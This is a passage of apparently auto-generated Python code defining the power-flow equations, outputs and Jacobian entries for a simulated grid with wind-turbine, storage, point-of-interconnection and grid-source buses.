struct[0].g[16,0] = -P_STmv/S_base + V_POImv*V_STmv*(b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_STlv*V_STmv*(b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv)) + V_STmv**2*(g_STmv_POImv + g_STmv_STlv)
struct[0].g[17,0] = -Q_STmv/S_base + V_POImv*V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) + g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_STlv*V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) + g_STmv_STlv*sin(theta_STlv - theta_STmv)) + V_STmv**2*(-b_STmv_POImv - b_STmv_STlv - bs_STmv_POImv/2 - bs_STmv_STlv/2)
struct[0].g[18,0] = -P_POI/S_base + V_GRID*V_POI*(b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI)) + V_POI**2*(g_POI_GRID + g_POI_POImv) + V_POI*V_POImv*(-b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].g[19,0] = -Q_POI/S_base + V_GRID*V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) + g_POI_GRID*sin(theta_GRID - theta_POI)) + V_POI**2*(-b_POI_GRID - b_POI_POImv - bs_POI_GRID/2 - bs_POI_POImv/2) + V_POI*V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) - g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].g[20,0] = -P_GRID/S_base + V_GRID**2*g_POI_GRID + V_GRID*V_POI*(-b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI)) - S_n_GRID*p_g_GRID/S_base
struct[0].g[21,0] = -Q_GRID/S_base + V_GRID**2*(-b_POI_GRID - bs_POI_GRID/2) + V_GRID*V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) - g_POI_GRID*sin(theta_GRID - theta_POI)) - S_n_GRID*q_g_GRID/S_base
struct[0].g[22,0] = K_p_GRID*(-i_d_GRID*(R_v_GRID*i_d_GRID + V_GRID*sin(delta_GRID - theta_GRID)) - i_q_GRID*(R_v_GRID*i_q_GRID + V_GRID*cos(delta_GRID - theta_GRID)) + p_m_GRID + xi_p_GRID/T_p_GRID) - omega_GRID + 1
struct[0].g[23,0] = -R_v_GRID*i_d_GRID - V_GRID*sin(delta_GRID - theta_GRID) + X_v_GRID*i_q_GRID
struct[0].g[24,0] = -R_v_GRID*i_q_GRID - V_GRID*cos(delta_GRID - theta_GRID) - X_v_GRID*i_d_GRID + e_qv_GRID
struct[0].g[25,0] = V_GRID*i_d_GRID*sin(delta_GRID - theta_GRID) + V_GRID*i_q_GRID*cos(delta_GRID - theta_GRID) - p_g_GRID
struct[0].g[26,0] = V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) - V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID) - q_g_GRID
struct[0].g[27,0] = K_sec_GRID*p_agc + p_c_GRID - p_m_GRID - (omega_GRID - omega_ref_GRID)/Droop_GRID
struct[0].g[28,0] = omega_GRID - omega_coi
struct[0].g[29,0] = K_i_agc*xi_freq + K_p_agc*(1 - omega_coi) - p_agc
# Outputs:
if mode == 3:
struct[0].h[0,0] = V_W1lv
struct[0].h[1,0] = V_W2lv
struct[0].h[2,0] = V_W3lv
struct[0].h[3,0] = V_STlv
struct[0].h[4,0] = V_W1mv
struct[0].h[5,0] = V_W2mv
struct[0].h[6,0] = V_W3mv
struct[0].h[7,0] = V_POImv
struct[0].h[8,0] = V_STmv
struct[0].h[9,0] = V_POI
struct[0].h[10,0] = V_GRID
struct[0].h[11,0] = i_d_GRID*(R_v_GRID*i_d_GRID + V_GRID*sin(delta_GRID - theta_GRID)) + i_q_GRID*(R_v_GRID*i_q_GRID + V_GRID*cos(delta_GRID - theta_GRID))
if mode == 10:
struct[0].Fx[0,0] = -K_delta_GRID
struct[0].Fx[1,0] = -V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) + V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID)
struct[0].Fx[2,2] = -1/T_v_GRID
if mode == 11:
struct[0].Fy[0,22] = Omega_b_GRID
struct[0].Fy[0,28] = -Omega_b_GRID
struct[0].Fy[1,20] = -i_d_GRID*sin(delta_GRID - theta_GRID) - i_q_GRID*cos(delta_GRID - theta_GRID)
struct[0].Fy[1,21] = V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) - V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID)
struct[0].Fy[1,23] = -2*R_v_GRID*i_d_GRID - V_GRID*sin(delta_GRID - theta_GRID)
struct[0].Fy[1,24] = -2*R_v_GRID*i_q_GRID - V_GRID*cos(delta_GRID - theta_GRID)
struct[0].Fy[1,27] = 1
struct[0].Fy[2,26] = -K_q_GRID/T_v_GRID
struct[0].Fy[3,28] = -1
struct[0].Gy[0,0] = 2*V_W1lv*g_W1mv_W1lv + V_W1mv*(-b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].Gy[0,1] = V_W1lv*V_W1mv*(-b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].Gy[0,8] = V_W1lv*(-b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].Gy[0,9] = V_W1lv*V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].Gy[1,0] = 2*V_W1lv*(-b_W1mv_W1lv - bs_W1mv_W1lv/2) + V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].Gy[1,1] = V_W1lv*V_W1mv*(-b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].Gy[1,8] = V_W1lv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].Gy[1,9] = V_W1lv*V_W1mv*(b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].Gy[2,2] = 2*V_W2lv*g_W2mv_W2lv + V_W2mv*(-b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].Gy[2,3] = V_W2lv*V_W2mv*(-b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].Gy[2,10] = V_W2lv*(-b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].Gy[2,11] = V_W2lv*V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].Gy[3,2] = 2*V_W2lv*(-b_W2mv_W2lv - bs_W2mv_W2lv/2) + V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].Gy[3,3] = V_W2lv*V_W2mv*(-b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].Gy[3,10] = V_W2lv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].Gy[3,11] = V_W2lv*V_W2mv*(b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].Gy[4,4] = 2*V_W3lv*g_W3mv_W3lv + V_W3mv*(-b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy[4,5] = V_W3lv*V_W3mv*(-b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy[4,12] = V_W3lv*(-b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy[4,13] = V_W3lv*V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy[5,4] = 2*V_W3lv*(-b_W3mv_W3lv - bs_W3mv_W3lv/2) + V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy[5,5] = V_W3lv*V_W3mv*(-b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy[5,12] = V_W3lv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy[5,13] = V_W3lv*V_W3mv*(b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy[6,6] = 2*V_STlv*g_STmv_STlv + V_STmv*(-b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy[6,7] = V_STlv*V_STmv*(-b_STmv_STlv*cos(theta_STlv - theta_STmv) + g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy[6,16] = V_STlv*(-b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy[6,17] = V_STlv*V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) - g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy[7,6] = 2*V_STlv*(-b_STmv_STlv - bs_STmv_STlv/2) + V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) - g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy[7,7] = V_STlv*V_STmv*(-b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy[7,16] = V_STlv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) - g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy[7,17] = V_STlv*V_STmv*(b_STmv_STlv*sin(theta_STlv - theta_STmv) + g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy[8,0] = V_W1mv*(b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].Gy[8,1] = V_W1lv*V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].Gy[8,8] = V_W1lv*(b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv)) + 2*V_W1mv*(g_W1mv_W1lv + g_W1mv_W2mv) + V_W2mv*(-b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].Gy[8,9] = V_W1lv*V_W1mv*(-b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv)) + V_W1mv*V_W2mv*(-b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].Gy[8,10] = V_W1mv*(-b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].Gy[8,11] = V_W1mv*V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].Gy[9,0] = V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].Gy[9,1] = V_W1lv*V_W1mv*(-b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].Gy[9,8] = V_W1lv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv)) + 2*V_W1mv*(-b_W1mv_W1lv - b_W1mv_W2mv - bs_W1mv_W1lv/2 - bs_W1mv_W2mv/2) + V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].Gy[9,9] = V_W1lv*V_W1mv*(b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv)) + V_W1mv*V_W2mv*(-b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].Gy[9,10] = V_W1mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].Gy[9,11] = V_W1mv*V_W2mv*(b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].Gy[10,2] = V_W2mv*(b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].Gy[10,3] = V_W2lv*V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].Gy[10,8] = V_W2mv*(b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].Gy[10,9] = V_W1mv*V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].Gy[10,10] = V_W1mv*(b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv)) + V_W2lv*(b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv)) + 2*V_W2mv*(g_W1mv_W2mv + g_W2mv_W2lv + g_W2mv_W3mv) + V_W3mv*(-b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].Gy[10,11] = V_W1mv*V_W2mv*(-b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv)) + V_W2lv*V_W2mv*(-b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv)) + V_W2mv*V_W3mv*(-b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].Gy[10,12] = V_W2mv*(-b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].Gy[10,13] = V_W2mv*V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].Gy[11,2] = V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].Gy[11,3] = V_W2lv*V_W2mv*(-b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].Gy[11,8] = V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].Gy[11,9] = V_W1mv*V_W2mv*(-b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].Gy[11,10] = V_W1mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv)) + V_W2lv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv)) + 2*V_W2mv*(-b_W1mv_W2mv - b_W2mv_W2lv - b_W2mv_W3mv - bs_W1mv_W2mv/2 - bs_W2mv_W2lv/2 - bs_W2mv_W3mv/2) + V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].Gy[11,11] = V_W1mv*V_W2mv*(b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv)) + V_W2lv*V_W2mv*(b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv)) + V_W2mv*V_W3mv*(-b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].Gy[11,12] = V_W2mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].Gy[11,13] = V_W2mv*V_W3mv*(b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].Gy[12,4] = V_W3mv*(b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy[12,5] = V_W3lv*V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy[12,10] = V_W3mv*(b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].Gy[12,11] = V_W2mv*V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].Gy[12,12] = V_POImv*(b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv)) + V_W2mv*(b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv)) + V_W3lv*(b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv)) + 2*V_W3mv*(g_W2mv_W3mv + g_W3mv_POImv + g_W3mv_W3lv)
struct[0].Gy[12,13] = V_POImv*V_W3mv*(-b_W3mv_POImv*cos(theta_POImv - theta_W3mv) - g_W3mv_POImv*sin(theta_POImv - theta_W3mv)) + V_W2mv*V_W3mv*(-b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv)) + V_W3lv*V_W3mv*(-b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy[12,14] = V_W3mv*(b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].Gy[12,15] = V_POImv*V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) + g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].Gy[13,4] = V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy[13,5] = V_W3lv*V_W3mv*(-b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy[13,10] = V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].Gy[13,11] = V_W2mv*V_W3mv*(-b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].Gy[13,12] = V_POImv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) + g_W3mv_POImv*sin(theta_POImv - theta_W3mv)) + V_W2mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv)) + V_W3lv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv)) + 2*V_W3mv*(-b_W2mv_W3mv - b_W3mv_POImv - b_W3mv_W3lv - bs_W2mv_W3mv/2 - bs_W3mv_POImv/2 - bs_W3mv_W3lv/2)
struct[0].Gy[13,13] = V_POImv*V_W3mv*(b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv)) + V_W2mv*V_W3mv*(b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv)) + V_W3lv*V_W3mv*(b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy[13,14] = V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) + g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].Gy[13,15] = V_POImv*V_W3mv*(-b_W3mv_POImv*sin(theta_POImv - theta_W3mv) + g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].Gy[14,12] = V_POImv*(-b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].Gy[14,13] = V_POImv*V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) - g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].Gy[14,14] = V_POI*(b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv)) + 2*V_POImv*(g_POI_POImv + g_STmv_POImv + g_W3mv_POImv) + V_STmv*(-b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_W3mv*(-b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].Gy[14,15] = V_POI*V_POImv*(-b_POI_POImv*cos(theta_POI - theta_POImv) - g_POI_POImv*sin(theta_POI - theta_POImv)) + V_POImv*V_STmv*(-b_STmv_POImv*cos(theta_POImv - theta_STmv) + g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_POImv*V_W3mv*(-b_W3mv_POImv*cos(theta_POImv - theta_W3mv) + g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].Gy[14,16] = V_POImv*(-b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv))
struct[0].Gy[14,17] = V_POImv*V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) - g_STmv_POImv*sin(theta_POImv - theta_STmv))
struct[0].Gy[14,18] = V_POImv*(b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].Gy[14,19] = V_POI*V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) + g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].Gy[15,12] = V_POImv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) - g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].Gy[15,13] = V_POImv*V_W3mv*(b_W3mv_POImv*sin(theta_POImv - theta_W3mv) + g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].Gy[15,14] = V_POI*(b_POI_POImv*cos(theta_POI - theta_POImv) + g_POI_POImv*sin(theta_POI - theta_POImv)) + 2*V_POImv*(-b_POI_POImv - b_STmv_POImv - b_W3mv_POImv - bs_POI_POImv/2 - bs_STmv_POImv/2 - bs_W3mv_POImv/2) + V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) - g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) - g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].Gy[15,15] = V_POI*V_POImv*(b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv)) + V_POImv*V_STmv*(-b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_POImv*V_W3mv*(-b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].Gy[15,16] = V_POImv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) - g_STmv_POImv*sin(theta_POImv - theta_STmv))
struct[0].Gy[15,17] = V_POImv*V_STmv*(b_STmv_POImv*sin(theta_POImv - theta_STmv) + g_STmv_POImv*cos(theta_POImv - theta_STmv))
struct[0].Gy[15,18] = V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) + g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].Gy[15,19] = V_POI*V_POImv*(-b_POI_POImv*sin(theta_POI - theta_POImv) + g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].Gy[16,6] = V_STmv*(b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy[16,7] = V_STlv*V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) + g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy[16,14] = V_STmv*(b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv))
struct[0].Gy[16,15] = V_POImv*V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) + g_STmv_POImv*sin(theta_POImv - theta_STmv))
struct[0].Gy[16,16] = V_POImv*(b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_STlv*(b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv)) + 2*V_STmv*(g_STmv_POImv + g_STmv_STlv)
struct[0].Gy[16,17] = V_POImv*V_STmv*(-b_STmv_POImv*cos(theta_POImv - theta_STmv) - g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_STlv*V_STmv*(-b_STmv_STlv*cos(theta_STlv - theta_STmv) - g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy[17,6] = V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) + g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy[17,7] = V_STlv*V_STmv*(-b_STmv_STlv*sin(theta_STlv - theta_STmv) + g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy[17,14] = V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) + g_STmv_POImv*sin(theta_POImv - theta_STmv))
struct[0].Gy[17,15] = V_POImv*V_STmv*(-b_STmv_POImv*sin(theta_POImv - theta_STmv) + g_STmv_POImv*cos(theta_POImv - theta_STmv))
struct[0].Gy[17,16] = V_POImv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) + g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_STlv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) + g_STmv_STlv*sin(theta_STlv - theta_STmv)) + 2*V_STmv*(-b_STmv_POImv - b_STmv_STlv - bs_STmv_POImv/2 - bs_STmv_STlv/2)
struct[0].Gy[17,17] = V_POImv*V_STmv*(b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_STlv*V_STmv*(b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy[18,14] = V_POI*(-b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].Gy[18,15] = V_POI*V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) - g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].Gy[18,18] = V_GRID*(b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI)) + 2*V_POI*(g_POI_GRID + g_POI_POImv) + V_POImv*(-b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv))
